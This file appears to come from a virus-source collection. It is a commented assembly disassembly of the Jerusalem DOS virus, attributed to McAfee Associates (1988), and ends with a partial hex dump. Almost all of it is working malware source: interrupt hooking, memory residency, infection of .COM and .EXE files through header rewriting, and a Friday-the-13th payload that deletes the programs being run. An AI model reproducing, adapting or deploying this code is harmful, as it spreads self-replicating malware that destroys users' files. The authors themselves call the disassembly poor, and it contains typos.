b/MSDOS/Virus.MSDOS.Unknown.virus33.asm @@ -0,0 +1,897 @@ +The following is a disassembled, structured and commented listing of the +Jerusalem .COM and .EXE infector virus. All comments, structure inclusions +and explanations are copyright John McAfee and Associates 1988, all rights +reserved. DO NOT distribute without contacting John at 408 988 3832, or +write : + + John McAfee + 4423 Cheeney Street + Santa Clara, CA 95054 + +(NOTE: This is an extraordinarily poor disassembly. We purposely spent +little time on it since it is a common virus that has been thoroughly +studied by dozens of others. - In other words - we were lazy). + + PAGE 64,132 +;-----------------------------------------------------------------------; +; THE "JERUSALEM" VIRUS ; +;-----------------------------------------------------------------------; + ; + ORG 100H ; + ; +;-----------------------------------------------------------------------; +; JERUSALEM VIRUS ; +;-----------------------------------------------------------------------; +BEGIN_COM: ;COM FILES START HERE + JMP CONTINUE ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A0103 DB 073H,055H + +MS_DOS DB 'MsDos' ; + + DB 000H,001H,015H,018H + +TIME_BOMB DB 0 ;WHEN == 1 THIS FILE GETS DELETED! + + DB 000H +A0010 DB 000H + +A0011 DW 100H ;HOST SIZE (BEFORE INFECTION) + +OLD_08 DW 0FEA5H,0F000H ;OLD INT 08H VECTOR (CLOCK TIC) + +OLD_21 DW 1460H,024EH ;OLD INT 21H VECTOR +OLD_24 DW 0556H,16A5H ;001B + +A_FLAG DW 7E48H ;??? + +A0021 DB 000H,000H,000H,000H,000H,000H,000H + DB 000H,000H,000H,000H + +A002C DW 0 ;A SEGMENT + + DB 000H,000H +A0030 DB 000H + +A0031 DW 0178EH ;OLD ES VALUE + +A0033 DW 0080H ; + ; +EXEC_BLOCK DW 0 ;ENV. SEG. ADDRESS ;0035 + DW 80H ;COMMAND LINE ADDRESS + DW 178EH ;+4 + DW 005CH ;FCB #1 ADDRESS + DW 178EH ;+8 + DW 006CH ;FCB #2 ADDRESS + DW 0178EH ;+12 + ; +HOST_SP DW 0710H ;(TAKEN FROM EXE HEADER) 0043 +HOST_SS DW 347AH ;(AT TIME OF INFECTION) +HOST_IP DW 00C5H ; +HOST_CS DW 347AH ; +;CHECKSUM NOT STORED, TO UNINFECT, YOU MUST CALC IT YOURSELF + ; +A004B DW 0F010H ; +A004D DB 82H ; +A004E DB 0 ; + +EXE_HDR DB 1CH DUP (?) ;004F + +A006B DB 5 DUP (?) ;LAST 5 BYTES OF HOST + +HANDLE DW 0005H ;0070 +HOST_ATT DW 0020H ;0072 +HOST_DATE DW 0021H ;0074 +HOST_TIME DW 002DH ;0076 + +BLOCK_SIZE DW 512 ;512 BYTES/BLOCK + +A007A DW 0010H + +HOST_SIZE DW 27C0H,0001H ;007C +HOST_NAME DW 41D9H,9B28H ;POINTER TO HOST NAME + +COMMAND_COM DB 'COMMAND.COM' + + DB 1 +A0090 DB 0,0,0,0,0 + +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +CONTINUE: ; + CLD ; + MOV AH,0E0H ;DO A ???... + INT 21H ; + ; + CMP AH,0E0H ; + JNC L01B5 ; + CMP AH,3 ; + JC L01B5 ; + ; + MOV AH,0DDH ; + MOV DI,offset BEGIN_COM ;DI = BEGINNING OF OUR (VIRUS) CODE + MOV SI,0710H ;SI = SIZE OF OUR (VIRUS) CODE + ADD SI,DI ;SI = BEGINNING OF HOST CODE + MOV CX,CS:[DI+11H] ;CX = (SIZE OF HOST CODE?) + INT 21H ; + ; +L01B5: MOV AX,CS ;TWEEK CODE SEGMENT BY 100H + ADD AX,10H ; + MOV SS,AX ;SS = TWEEKed CS + MOV SP,700H ;SP = END OF OUR CODE (VIRUS) + ; +;TWEEK CS TO MAKE IT LOOK LIKE IP STARTS AT 0, NOT 100H BY DOING A RETF + ; + PUSH AX ;JMP FAR CS+10H:IP-100H + MOV AX,offset BEGIN_EXE - offset BEGIN_COM + PUSH AX ; + RETF ; + ; +;---------------------------------------; + ORG 0C5h ; +;---------------------------------------; + ; +BEGIN_EXE: ;EXE FILES START HERE + CLD ; + PUSH ES ; + ; + MOV CS:[A0031],ES ; + MOV CS:[EXEC_BLOCK+4],ES ;INIT EXEC_BLOCK SEG VALUES + MOV CS:[EXEC_BLOCK+8],ES ; + MOV CS:[EXEC_BLOCK+12],ES ; + ; + MOV AX,ES ;TWEEK ES SAME AS CS ABOVE + ADD AX,10H ; + ADD CS:[HOST_CS],AX ; SAVE NEW ES VALUE + ADD CS:[HOST_SS],AX ; + ; + MOV AH,0E0H ; + INT 21H ; + ; + CMP AH,0E0H ; + JNC L0106 ;00F1 7313 + ; + CMP AH,3 ; + POP ES ;00F6 + MOV SS,CS:[HOST_SS] ; + MOV SP,CS:[HOST_SP] ; + JMP far CS:[HSOT_IP] ; + ; +L0106: XOR AX,AX ;0106 33C0 + MOV ES,AX ;0108 8EC0 + MOV AX,ES:[03FC] ;010A 26A1FC03 + MOV CS:[A004B],AX ;010E 2EA34B00 + MOV AL,ES:[03FE] ;0112 26A0FE03 + MOV CS:[A004D],AL ;0116 2EA24D00 + MOV Word ptr ES:[03FC],A5F3 ;011A 26C706FC03F3A5 + MOV Byte ptr ES:[03FE],CB ;0121 26C606FE03CB + POP AX ;0127 58 + ADD AX,10H ;0128 051000 + MOV ES,AX ;012B 8EC0 + PUSH CS ;012D 0E + POP DS ;012E 1F + MOV CX,710H ;SIZE OF VIRUS CODE + SHR CX,1 ;0132 D1E9 + XOR SI,SI ;0134 33F6 + MOV DI,SI ;0136 8BFE + PUSH ES ;0138 06 + MOV AX,0142 ;0139 B84201 + PUSH AX ;013C 50 + JMP 0000:03FC ;013D EAFC030000 + ; + MOV AX,CS ;0142 8CC8 + MOV SS,AX ;0144 8ED0 + MOV SP,700H ;0146 BC0007 + XOR AX,AX ;0149 33C0 + MOV DS,AX ;014B 8ED8 + MOV AX,CS:[A004B] ;014D 2EA14B00 + MOV [03FC],AX ;0151 A3FC03 + MOV AL,CS:[A004D] ;0154 2EA04D00 + MOV [03FE],AL ;0158 A2FE03 + MOV BX,SP ;015B 8BDC + MOV CL,04 ;015D B104 + SHR BX,CL ;015F D3EB + ADD BX,+10 ;0161 83C310 + MOV CS:[A0033],BX ; + ; + MOV AH,4AH ; + MOV ES,CS:[A0031] ; + INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... + JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ; + JMP N08_90 ; + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? + PUSH CX ;*** COMMENTS SOLICITED **** - WS + PUSH SI ; + MOV CX,4001H ; YES IT IS (1/2 HOUR) BUT THE FUCKER NEVER + REP LODSB ;GETS EXECUTED!!!!!!!!!!! -RLP + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? + MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... + JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECTION PROCESS OCCURS HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... + INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE (OBVIOUSLY) + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE - YES + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... + JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... +;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H +;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... +;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l +;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M +;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. +;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC +;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. +;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. +;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. +;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. +;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P +;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 +;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... +;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| +;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C +;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# +;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s +;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 +;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. +;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K +;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S +;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. +;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... +;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& +;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. +;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 +;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... +;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. +;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... +;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 +;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... +;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: +;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. +;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7. +;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X... +;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9. +;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u +;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t( +;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX +;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$.. +;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P +;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?! +;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+ +;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z. +;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%. +;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum... +;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)... +;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B 